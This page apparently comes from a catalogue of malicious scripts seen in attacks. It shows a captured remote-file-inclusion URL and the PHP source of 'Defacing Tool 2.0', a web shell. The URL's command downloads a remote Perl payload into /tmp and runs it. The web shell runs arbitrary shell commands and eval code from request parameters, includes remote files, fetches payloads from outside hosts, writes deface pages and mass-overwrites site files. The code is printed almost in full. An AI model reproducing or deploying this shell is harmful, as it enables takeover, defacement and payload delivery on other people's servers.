Script potentiellement dangereux sur sprula-kit-net
IP de provenance : 201.21.186.174
Date de connexion : 29-03-2008 19:37:44
Site : http://sprula.kit.net/cmdpriv8/tool25.dat?&cmd=cd%20/tmp;GET%20http://www.sprula.kit.n
et/bruxom4l.txt%20>%20bruxom4l.txt;perl%20bruxom4l.txt%20abcase
Retour liste scripts
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo,
por favor, mantenha o nome de seus autores originais
e por favor, entre em contato
comigo...
ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um
sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um
babaca, ajude a melhora-lo tambem!!
-->
<?php
//The
Rules
include("http://sprula.kit.net/cmdpriv8/therules25.dat");
if(empty($chdir))
$chdir = @$_GET['chdir'];
if(empty($chdir)) $chdir =
@$_REQUEST['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($cmd)) $cmd =
@$_REQUEST['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($fu)) $fu =
@$_REQUEST['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($list)) $list =
@$_REQUEST['list'];
if(empty($eval)) $eval = @$_GET['eval'];
if(empty($eval)) $eval
= @$_REQUEST['eval'];
if(empty($evalcode)) $evalcode =
@$_POST['evalcode'];
if(empty($evalcode)) $evalcode =
@$_GET['evalcode'];
if(empty($evalcode)) $evalcode =
@$_REQUEST['evalcode'];
if(empty($evalfile)) $evalfile =
@$_GET['evalfile'];
if(empty($evalfile)) $evalfile = @$_REQUEST['evalfile'];
$cmd
= stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and
strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 =
explode(";",$boom['1'], 2);
$toDir =
$boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir
..')!==false){
$cadaDir =
array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0']
==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/";
$chdir = $chdir."/";}
$toDir =
str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else
if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir
~')===0) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1))
$toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or
@is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or
@is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1:
chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd =
trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir,
'//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir))
$ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir
'$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it,
try to use 'cd' in the cmd line instead.\n";
$cmdShow = htmlspecialchars($cmd,
ENT_QUOTES);
//To keep the changes in the url, when using the 'GET' way to send php
variables
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else
$showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or
empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0"
or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'";
$fl="off";}
//if($dtheme=="" or empty($dtheme))$dtheme="";else
$showtheme="+'dtheme=$dtheme&'";
//INFO table (pro and normal)
/*if
(@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at
/usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc"))
$pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget"))
$pro3="<i>wget</i> at /usr/bin/wget, ";
if
(@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx,
";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc,
";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc
";*/
$safe = @ini_get('safe_mode');
if ($safe)
$pro.="<b><i>safe_mode</i>: $safe</b>, "; else
$pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP
</i>".phpversion();
$pro .= ", <span
class='infod'><i><b>click for more
info</b></i></span>";
$login=@posix_getuid(); $euid=@posix_geteuid();
$gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname =
@posix_uname();
//Turns the 'ls' command more usefull, showing it as it looks in the
shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --',
$cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F',
$cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F',
$cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F',
$cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd,
its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/',
$chdir);
?>
<body onload="focar();">
<?
//Style page - must be into
the body tag
include($style_addr);
?>
<script>
function inclVar(){var addr
= location.href.substring(0,location.href.indexOf('?')+1);var stri =
location.href.substring(addr.length,location.href.length+1);inclvar =
stri.substring(0,stri.indexOf('='));}
function
enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclv
ar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;?>
t;+'cmd='+window.document.formulario.cmd.value;return false;}
function
ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+in
clvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl.$showtheme;?>+'
fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function
PHPget(){inclVar(); /*if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc
soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso?
\nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo
recurso."))goPreGet(); else{*/var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do
arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou
ftp://:","http://www.amigosdosaber.org.br/debora/");var dir =
c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var
p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho
completo\n-O diretorio de destino deve ser
writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inc
lvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$sh
owdir.$showtheme;?>+'c='+c+'&p='+p);}/*}*/
function
goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$
phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir.$showtheme;?>
t;+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by
r3v3ng4ns\nDigite a URL do frame","http://www.amigosdosaber.org.br/debora/");var dir =
url.substring(0,url.lastIndexOf('/')+1);var file =
url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite
o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve
ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by
r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by
r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_a
ddr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir.$showtheme;?>+'url
='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[
PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho
completo\n-Abrir arquivos remotos, use http:// ou
ftp://","<?=$chdir;?>/index.php"); var dir =
o.substring(0,o.lastIndexOf('/')+1);var file =
o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<
;?=$feditor_addr;?>?&'<?=$showtheme;?>+'inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a
SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'=
'+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false
}}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1;
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd
_addr;?>'+'?&'<?=$showdir.$showfu.$showtheme;?>+'list='+turn+'&cmd=
'+window.document.formulario.cmd.value;return false;}
function
overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do
diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos
serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for
para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive
o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize
http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite
a origem do arquivo que
substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm
("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague
os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos
arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja
substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a
palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar
um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de
origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?
>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu.$showtheme?>+'&k
eyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
function
evalAct(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+in
clvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;
?>+'eval=1#evalFocus';return false;}
function evalC(){inclVar();
oque=window.document.evalform.evalcode.value;
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd
_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;?>+'eval=1&evalc
ode='+oque+'#evalFocus';return false;}
//function
[...]
Retour liste scripts
Crédits vignettes :
Thumbzor